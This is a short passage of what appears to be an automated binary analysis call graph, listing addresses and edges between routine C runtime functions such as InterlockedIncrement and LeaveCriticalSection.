3683->3681 3684 f64fb3 __amsg_exit 65 API calls 3683->3684 3685 f6613e 3684->3685 3685->3681 3865 f6603e LeaveCriticalSection 3686->3865 3688 f6467a 3688->3633 3690 f64278 InterlockedIncrement 3689->3690 3691 f6427b 3689->3691 3690->3691 3692 f64288 3691->3692 3693 f64285 InterlockedIncrement 3691->3693 3694 f64295 3692->3694 3695 f64292 InterlockedIncrement 3692->3695 3693->3692 3696 f6429f InterlockedIncrement 3694->3696 3697 f642a2 3694->3697 3695->3694 3696->3697 3698 f642bb InterlockedIncrement 3697->3698 3699 f642cb InterlockedIncrement 3697->3699 3700 f642d6 InterlockedIncrement 3697->3700 3698->3697 3699->3697 3700->3636 3866 f6603e LeaveCriticalSection 3701->3866 3703 f646c8 3703->3638 3705 f66061 __CxxUnhandledExceptionFilter 3704->3705 3706 f66087 3705->3706 3729 f651a6 3705->3729 3712 f66097 __CxxUnhandledExceptionFilter 3706->3712 3765 f66184 3706->3765 3710 f660a2 3713 f660a9 3710->3713 3714 f660b8 3710->3714 3712->3683 3718 f64c83 __wcsicoll 65 API calls 3713->3718 3717 f66117 ___crtLCMapStringA 65 API calls 3714->3717 3715 f6607d 3762 f64d11 3715->3762 3719 f660bf 3717->3719 3718->3712 3720 f660c7 InitializeCriticalSectionAndSpinCount 3719->3720 3721 f660f2 3719->3721 3723 f660d7 3720->3723 3728 f660e3 3720->3728 3722 f6614a __freea 65 API calls 3721->3722 3722->3728 3724 f6614a __freea 65 API calls 3723->3724 3726 f660dd 3724->3726 3727 f64c83 __wcsicoll 65 API calls 3726->3727 3727->3728 3770 f6610e 3728->3770 3773 f67578 3729->3773 3731